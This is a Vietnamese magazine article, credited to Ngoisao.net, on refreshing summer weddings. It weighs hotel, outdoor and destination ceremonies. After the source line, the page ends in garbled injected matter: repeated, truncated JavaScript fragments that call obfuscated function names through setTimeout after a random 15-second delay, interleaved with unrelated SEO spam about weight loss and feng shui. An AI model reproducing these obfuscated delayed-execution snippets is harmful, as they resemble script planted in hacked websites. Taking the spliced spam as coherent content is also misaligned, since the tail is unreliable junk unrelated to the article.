Làm Mới Đám Cưới Mùa Hè

Dù chọn địa điểm cưới ở đâu, cô dâu chú rể vẫn có những cách gây ấn tượng với khách mời bằng cách tổ chức sáng tạo, độc đáo.

102ed-6648-1393558457
Cách trang trí lạ, chương trình cưới độc đáo sẽ gây ấn tượng với khách mời. Ảnh: A.X.

Vào mùa hè, cô dâu chú rể sẽ có nhiều lựa chọn khi tìm nơi tổ chức đám cưới. Bạn có thể làm lễ thành hôn ở các sảnh tiệc, hoặc chọn không gian ngoài trời để tổ chức cưới, nếu có nhiều thời gian và chi phí, đôi uyên ương có thể cưới tại các địa điểm du lịch, kết hợp đám cưới với du lịch. Dù tổ chức cưới ở đâu, việc làm mới đám cưới cũng quan trọng, để ghi dấu ấn ngày trọng đại và tạo cá tính riêng cho hôn lễ.

1. Lễ cưới tại khách sạn

Tổ chức cưới tại nhà hàng, khách sạn là lựa chọn phổ biến của nhiều người. Ưu điểm của cách tổ chức cưới này là cô dâu chú rể không phải lo nghĩ hay chuẩn bị nhiều vì các phụ kiện cần thiết cho đám cưới đã được nhà hàng cung cấp. Ngoài hệ thống âm thanh, ánh sáng, phông màn, bàn ghế có sẵn, nhà hàng cũng sẽ có các nhân viên phục vụ khách trong tiệc. Với sự phát triển của các đám cưới như hiện nay, nhiều nơi đãi tiệc cũng có những dịch vụ trọn gói để trang trí, lên kịch bản, MC, lo liệu toàn bộ chương trình ngày cưới.

đỏ (8)

Tuy nhiên, nhược điểm của địa điểm cưới này là sự rập khuôn, sảnh tiệc gần như giống nhau về không gian thiết kế và trang trí, chương trình cưới cũng tương tự, bắt đầu từ việc giới thiệu cô dâu chú rể, nghi thức cưới truyền thống, bố mẹ phát biểu và mời khách nhập tiệc.

Để khắc phục điều này, nhiều cô dâu chú rể muốn trang trí đám cưới theo ý tưởng và phong cách của riêng mình. Bạn có thể tìm wedding planner để lo liệu đám cưới hoặc trực tiếp làm việc với quản lý nhà hàng. Khi ký hợp đồng với sảnh tiệc, bạn nên nêu rõ nhu cầu của mình với quản lý vì một số nơi không cho bạn mang phụ kiện trang trí vào hoặc thậm chí tính thêm phí dịch vụ nếu cô dâu chú rể tự trang trí. Bạn nên làm việc với người quản lý trước để thuyết phục cho mang dịch vụ bên ngoài vào nhà hàng, đổi lại, bạn cần đảm bảo không làm hỏng không gian hay ảnh hưởng tới cơ sở vật chất của phòng tiệc.

2. Lễ cưới ngoài trời

Tổ chức đám cưới ngoài trời là cách nhiều cô dâu chú rể chọn để ghi dấu ấn ngày trọng đại. Không gian tiệc cưới sẽ không bị bó gọn trong 4 bức tường nhà hàng mà nằm giữa thiên nhiên thoáng rộng. Các địa điểm được nhiều cô dâu chú rể yêu thích lựa chọn là sân vườn tại nhà, cạnh hồ bơi hoặc sân vườn của khách sạn, quán cafe ngoài trời hay các khu nghỉ dưỡng ở ven thành phố…

backdrop1 (3)

Ưu điểm của lễ cưới ngoài trời là cảm giác gần gũi với thiên nhiên. Cô dâu chú rể có thể biến không gian mở thành nhiều khu vực với phong cách khác nhau, từ nơi đón khách, nơi tổ chức lễ thành hôn, nơi đãi tiệc và nơi vui chơi sau đám cưới. Khi được tham dự tiệc ngoài trời thoải mái, khách mời cũng sẽ ghi nhớ và có ấn tượng sâu sắc về đám cưới hơn.

Nhưng để tổ chức cưới ngoài trời suôn sẻ, cô dâu chú rể cũng không khỏi tốn công sức vì hai người sẽ phải tự chuẩn bị nhiều việc. Các hạng mục cần thiết cho đám cưới như bàn ghế, trang trí, âm thanh ánh sáng… đều không có sẵn nên bạn phải thuê, mượn tất cả các chi tiết tối thiểu này cho đám cưới. Vì phải tự lo liệu, cô dâu chú rể sẽ mệt và phải chi nhiều tiền hơn cho đám cưới ngoài trời. Vào mùa hè nắng chói chang hay mùa đông lạnh, bạn cũng phải thuê thêm lều trại để dựng nhằm che mưa che nắng cho khách.

3. Đám cưới kết hợp du lịch

Xu hướng tổ chức đám cưới ở những thành phố du lịch, cách xa quê hương của cô dâu chú rể không còn xa lạ với uyên ương Việt Nam. Cô dâu chú rể sẽ mời khoảng vài chục người hoặc trên dưới 100 người tới một địa điểm du lịch nào đó để dự đám cưới. Các địa điểm thích hợp để tổ chức đám cưới kết hợp du lịch thường là những khu nghỉ dưỡng. Thời gian tiệc cưới diễn ra ít nhất từ 2 – 3 ngày đến một tuần lễ tùy hai nhân vật chính và thời gian của khách mời.

backdrop1 (6)

Đám cưới kết hợp du lịch có một số ưu điểm như: đây sẽ là kỷ niệm trọng đại không thể nào quên của đôi uyên ương, đồng thời khách mời cũng có một kỳ nghỉ ấn tượng. Tuy nhiên, khi tổ chức đám cưới ở khu nghỉ dưỡng, các đôi uyên ương sẽ phải lên kinh phí cho các khoản như: chi phí trang trí, đặt tiệc, chi phí thuê phòng nghỉ ngơi cho khách mời. Vì các khoản này không nhỏ nên cô dâu chú rể thường giới hạn số lượng khách ít để phục vụ được chu đáo nhất. Các đôi uyên ương nên tìm đến wedding planner, nhờ họ tư vấn và tổ chức chương trình đám cưới sao cho suôn sẻ, thích hợp với ngân sách của cô dâu chú rể.

Nguồn: Ngoisao.net

try a pair of shorts andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andandom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);} a feminine top
christina aguilera weight lossAnnual Forecasts Fengshui Remedies for 2006
how to lose weight fast